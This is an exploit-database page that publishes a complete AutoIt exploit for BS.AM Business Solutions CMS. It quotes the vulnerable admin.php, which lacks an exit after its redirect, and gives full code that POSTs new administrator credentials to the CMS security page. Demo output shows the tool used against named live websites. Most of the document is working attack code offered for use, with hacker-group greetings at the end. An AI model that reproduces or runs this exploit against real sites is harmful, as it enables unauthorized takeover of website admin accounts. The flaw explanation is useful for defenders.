BS.AM Business Solutions CMS remote add admin exploit

2013.01.11

Credit: AkaStep

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#cs
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
bs_am_remote_add_admin.au3
BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.
THIS IS A EXPLOIT WRITTEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
ON SUCCESSFULL REMOTE EXPLOITATION IT WILL NEW ADMIN TO TARGET SITE.
***** THIS IS A WHOLE EXPLOIT! *****
THANK YOU!
FEW DEMOS:
http://asba.am
http://doors.am
DEMO USAGE:
>poc.exe http://asba.am bigbang bigbang
##############################################################
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: poc.exe http://site.tld username password
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]
##################################################
Trying to add new admin:
To Site:www.asba.am
With Username: bigbang
With Password: bigbang
##################################################
##################################################
Exploit Try Count:1
##################################################
Error Count: 0
##################################################
##################################################
Exploit Try Count:2
##################################################
Error Count: 0
##################################################
Count of errors during exploitation : 0
##################################################
[*] Seems we are going to travel xD. [*]
Try to login @
Site: asba.am/cms/index.php
With Username: bigbang
With Password: bigbang
##################################################
[*] Exit [*]
##################################################
VULNERABLE CODE:
NOTICE script continues it's execution.Because missing exit; after header();
FUNNY TO SEE HOW MANY PROGRAMMERS FAILS TO UNDERSTAND THIS;)
//cms/admin.php
============SNIP BEGINS============
<?
session_start();
if ($_SESSION['login11_error'] != "no")
header("Location: index.php");
include 'config.php';?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>cms::</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="css/main.css" />
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>
<script type="text/javascript" src="javascript/admin.js"></script>
<script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script>
<script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script>
<script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script>
<link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" />
</head>
<body>
<div id="header">
============SNIP ENDS HERE===========
#ce
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
@CRLF & "[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)
$method='POST';
$vulnurl='cms/admin.php?lang=en&page=security';
Global $count=0,$error=0;
$cmsindent='CaptchaSecurityImages.php';
$adminpanel='/cms/index.php';
if $CmdLine[0] <> 3 Then
MsgBox(64,"","Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://www.site.tld ' & ' username ' & 'password' & @CRLF);
exit;
EndIf
if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));
$sidentify=_INetGetSource($targetsite & $adminpanel,True);
if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf
$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')
priv8($targetsite,$username,$password,$count,$error);#~ do magic for me plizzz));~#
Func priv8($targetsite,$username,$password,$count,$error)
$count+=1;
Global $sAddress = $targetsite
$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)
$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "username=" & $username & "&password=" & $password & "&rewrite_password=" & $password & "&ifsubmit=yes";
if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)
if int($error)=0 then
ConsoleWrite($triptrop & '[*] Seems we are going to travel xD. [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else
ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*] May be you are Lucky;) [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
EndIf
exit;
EndIf
Global $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)");
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)
Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(1500);
priv8($targetsite,$username,$password,$count,$error);
Else
$error+=1
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(1500);
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#
EndIf
EndFunc;=> priv8();
#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
#ce

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

BS.AM Business Solutions CMS remote add admin exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.